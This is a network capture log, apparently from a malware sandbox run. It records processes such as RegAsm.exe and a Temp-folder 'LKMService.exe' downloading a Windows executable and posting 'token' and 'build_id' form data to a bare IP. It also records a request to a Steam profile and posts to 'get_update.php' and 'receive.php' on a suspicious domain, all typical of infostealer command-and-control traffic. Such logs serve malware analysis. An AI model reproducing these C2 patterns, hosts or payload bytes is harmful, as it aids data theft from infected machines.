2024-10-02 07:43:00 UTC	264	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:43:00 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Wednesday, 02-Oct-2024 07:43:00 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-10-02 07:43:00 UTC	16120	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-10-02 07:43:00 UTC	16384	IN	Data Raw: d3 b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-10-02 07:43:00 UTC	16384	IN	Data Raw: 24 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 Data Ascii: $@:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhS
2024-10-02 07:43:00 UTC	16384	IN	Data Raw: 83 f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-10-02 07:43:00 UTC	16384	IN	Data Raw: 89 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-10-02 07:43:00 UTC	16384	IN	Data Raw: 8b 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-10-02 07:43:00 UTC	16384	IN	Data Raw: 24 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: $td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-10-02 07:43:00 UTC	16384	IN	Data Raw: fe ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-10-02 07:43:00 UTC	16384	IN	Data Raw: 1c 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-10-02 07:43:00 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$
2024-10-02 07:43:02 UTC	16384	IN	DELETE FROM %Q.'%q_docsize' WHERE id=?SELECT sz%s FROM %Q.'%q_docsize' WHERE id=?REPLACE INTO %Q.'%q_config' VALUES(?,?)SELECT %s FROM %s AS T,?,originDROP TABLE IF EXISTS %Q.'%q_data';DROP TABLE IF EXISTS %Q.'%q_idx';DROP TABLE IF EXISTS %Q.'%q_config';DROP TABLE IF EXISTS %Q.'%q_docsize';DROP TABLE IF EXISTS %Q.'%q_content';ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';CREATE TABLE %Q.'%q_%q'(%s)%sfts5: error creating shadow table %q_%s: %sid INTEGER PRIMARY KEY, c%did INTEGER PRIMARY KEY, sz BLOBid INTEGER PRIMARY KEY, sz BLOB, origin INTEGERk PRIMARY KEY, vDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';SELECT count() FROM %Q.'%q_%s'tokencharsseparatorsL N* Cocategoriesremove_diacriticscase_sensitiveasciitrigramcolrowinstancefts5vocab: unknown table type: %Q [TRUNCATED] r:Y<\|=>MbP?\|^~?9RF??14????K(??? ?333333?-DT!?@@-DT!@!3\|@@@-DT!@@$@4@>@aTR'>@H@cL@Zd;M@Y@fffff^@r@v@@@p@@@@@@A`&A.A@}<A`FASA TAcApAdyAAeAA _B MB@dB/dB0CW4vCCC [TRUNCATED] i" i"$i"0i"8i"Di"Pi"\i"hi" xi"i"!i"i"i"i"i"i"i"i""i"!!i""!i"9"i"?"D!!i"!i"!i"i"i"i"i"i"i"i"j"j"j"j"j"j"j"j" j",j"8j"Dj"Pj"lj"xj"j"j"j"j" k"Dk"#pk"k" k"k"&l"0l"Dl"Hl"Pl"dl"#l"l"l"l"l"l"%,m"$Xm"%m"+m"m" n""0n"(dn"n"n"n"n"!n"o"0o"Ho"lo"!!9"i"i"D!lj"o"__based(__cdecl__pascal__stdcall__th [TRUNCATED] 9/I?hKd?81UH!G?#$0\|f?KRVnTUUUU?~I$I?gHB;E?q{?x? @ @??@>1\|MCatan2; cC($($($cC($000 cC6@cosUUUUUU?UUUUUU?llV4V>>m0_$@8C`a=`a=@T!?sp.c;`C<??i~@sinh!87Acosh(8UA7Gtanh!87Ay-8C8C0<0<+eGW@+eGW@B.?B.?:;=:;=t?ZfUUU?&WU?{?? [TRUNCATED] !5ACPRSWYlm pr )Y"\"\/"/X"""0"""T"v"""0"x""@"""v"","@"""api-ms-win-core-datetime-l1-1-1api-ms-win-core-file-l1-2-4api-ms-win-core-file-l1-2-2api-ms-win-core-localization-l1-2-1api-ms-win-core-localization-obsolete-l1-2-0api-ms-win-core-processthreads-l1-1-2api-ms-win-core-string-l1-1-0api-ms-win-core-sysinfo-l1-2-1api-ms-win-c [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49855	49.12.197.9	443	1364	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:03 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDBAKKKFBGDHJKFHJJJJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:43:03 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 62 62 35 33 63 36 66 63 32 31 66 39 34 31 32 65 65 66 33 33 34 34 61 34 62 64 30 37 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 41 4b 4b 4b 46 42 47 44 48 4a 4b 46 48 4a 4a 4a 4a 0d 0a 43 6f 6e 74 Data Ascii: ------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="token"fbb53c6fc21f9412eef3344a4bd07518------GDBAKKKFBGDHJKFHJJJJContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------GDBAKKKFBGDHJKFHJJJJCont
2024-10-02 07:43:03 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:43:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:43:03 UTC	15	IN	Data Raw: 35 0d 0a 62 6c 6f 63 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 5block0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.4	49857	104.102.49.254	443	6704	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:07 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:43:07 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 02 Oct 2024 07:43:07 GMT Content-Length: 34879 Connection: close Set-Cookie: sessionid=9974f6ea0dd365cc63b0fd49; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-02 07:43:07 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-02 07:43:07 UTC	16384	IN	Data Raw: 52 54 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 Data Ascii: RT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4
2024-10-02 07:43:07 UTC	3768	IN	Data Raw: 75 6d 6d 61 72 79 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 Data Ascii: ummary"></div><div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><scr
2024-10-02 07:43:07 UTC	213	IN	Data Raw: 63 6b 3d 22 52 65 73 70 6f 6e 73 69 76 65 5f 52 65 71 75 65 73 74 4d 6f 62 69 6c 65 56 69 65 77 28 29 22 3e 0d 0a 09 09 09 09 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: ck="Responsive_RequestMobileView()"><span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49858	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:08 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-02 07:43:08 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:43:08 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-02 07:43:08 UTC	637	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3xgBMGv0ZxiJMs3AIBcPNTs3vZUvjFFCKffDCZmMjFolmfiwHnL9NERgaKELr2BphVLZkbAPMLMkJv0PxDejftcjwOXYKfOx8PO%2B76Bpzd1%2BlVcQzhwWJxy9MMDA%2F20PbA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30f4c0ad543bc-EWR alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49859	49.12.197.9	443	6704	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:08 UTC	184	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:43:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:43:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:43:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49861	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:43:09 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:43:09 UTC	25	IN	HTTP/1.1 100 Continue
